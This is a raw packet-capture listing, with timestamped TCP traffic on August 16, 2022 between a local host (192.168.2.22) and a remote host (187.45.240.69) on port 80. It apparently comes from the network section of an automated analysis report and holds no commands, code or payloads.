                                        Aug 16, 2022 10:49:05.300062895 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.300069094 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.300110102 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.300116062 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.300271034 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.300287962 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.300338030 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.300369024 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.300431967 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.300477028 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.300514936 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.300548077 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.300569057 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.300589085 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.300590038 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.300609112 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.300623894 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.300631046 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.300647020 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.300664902 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.300673962 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.300708055 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.300745010 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.300751925 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.300787926 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.300806046 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.300822973 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.300844908 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.300851107 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.300868988 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.300870895 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.300889015 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.300894976 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.300908089 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.300925970 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.300941944 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.300959110 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.300990105 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.301007032 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.301024914 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.301110983 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.301146984 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.301176071 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.301218987 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.301223993 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.301243067 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.301273108 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.301289082 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.301321030 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.301346064 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.301426888 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.301472902 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.301592112 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.301702023 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.301716089 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.301753998 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.301794052 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.301826954 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.301841974 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.301867008 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.301867008 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.301891088 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.301932096 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.301949978 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.301990986 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.302027941 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.302067995 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.302073956 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.302084923 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.302086115 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.302104950 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.302108049 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.302124023 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.302145958 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.302148104 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.302190065 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.302207947 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.302208900 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.302232027 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.302257061 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.302428007 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.302450895 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.302470922 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.302475929 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.302516937 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.302542925 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.302560091 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.302577019 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.302589893 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.302608013 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.302622080 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.302624941 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.302664042 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.302680969 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.302704096 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.302706003 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.302723885 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.302746058 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.302752018 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.302784920 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.302800894 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.302803040 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.302819967 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.302866936 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.302885056 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.302907944 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.302917004 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.302930117 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.302932978 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.302948952 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.302966118 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.302978992 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.302993059 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.303025007 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.303025007 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.303065062 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.303081989 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.303087950 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.303106070 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.303119898 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.303126097 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.303149939 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.303189039 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.303190947 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.303211927 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.303229094 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.303236961 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.303246975 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.303256035 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.303265095 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.303275108 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.303282976 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.303296089 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.303302050 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.303312063 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.303322077 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.303339958 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.303342104 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.303348064 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.303378105 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.303392887 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.303395987 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.303416014 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.303431988 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.303447962 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.303466082 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.303466082 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.303489923 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.303503990 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.303519964 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.303536892 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.303554058 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.303560019 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.303575039 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.303586006 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.303595066 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.303628922 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.303668022 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.303673983 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.303705931 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.303709984 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.303729057 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.303746939 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.303770065 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.303788900 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.303791046 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.303806067 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.303823948 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.303833008 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.303848982 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.303865910 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.303869009 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.303883076 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.303901911 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.303926945 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.303931952 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.303947926 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.303951025 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.303958893 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.303982019 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.304023027 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.304034948 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.304064035 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.304074049 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.304080963 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.304097891 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.304110050 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.304115057 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.304145098 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.304156065 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.304188013 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.304203987 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.304234028 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.304236889 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.304251909 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.304258108 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.304270983 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.304275990 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.304294109 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.304300070 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.304317951 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.304320097 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.304359913 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.304821968 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.304847956 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.304864883 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.304866076 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.304883003 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.304883957 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.304900885 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.304905891 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.304919004 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.304927111 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.304939032 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.304949045 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.304958105 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.304976940 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.304976940 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.304994106 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.305001020 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.305011034 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.305020094 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.305030107 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.305047989 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.305049896 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.305064917 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.305082083 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.305099010 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.305099964 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.305109978 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.305119038 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.305136919 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.305139065 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.305155039 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.305156946 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.305174112 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.305176020 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.305191994 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.305193901 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.305210114 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.305212021 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.305227995 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.305234909 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.305246115 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.305255890 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.305263996 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.305280924 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.305283070 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.305300951 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.305303097 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.305315971 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.305324078 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.305342913 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.305342913 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.305360079 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.305362940 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.305377960 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.305378914 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.305397034 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.305398941 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.305414915 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.305423021 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.305433989 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.305434942 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.305450916 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.305459976 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.305469036 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.305489063 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.305509090 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.305512905 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.305519104 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.305531979 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.305548906 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.305551052 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.305566072 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.305571079 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.305584908 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.305603027 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.305612087 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.305620909 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.305620909 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.305624962 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.305649042 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.305670023 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.307204962 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.307477951 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.347641945 CEST8049204187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.347788095 CEST4920480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.351169109 CEST4920480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.482048988 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.482084036 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.482101917 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.482116938 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.482119083 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.482141972 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.482146025 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.482147932 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.482373953 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.482409954 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.482532024 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.482558966 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.482574940 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.482589960 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.482592106 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.482599020 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.482611895 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.482614040 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.482629061 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.482641935 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.482646942 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.482654095 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.482665062 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.482673883 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.482681990 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.482695103 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.482700109 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.482707024 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.482717991 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.482726097 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.482736111 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.482744932 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.482753992 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.482760906 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.482770920 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.482779026 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.482788086 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.482796907 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.482805967 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.482808113 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.482821941 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.482837915 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.482851028 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.482855082 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.482860088 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.482872963 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.482882023 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.482891083 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.482907057 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.482920885 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.482924938 CEST8049203187.45.240.69192.168.2.22
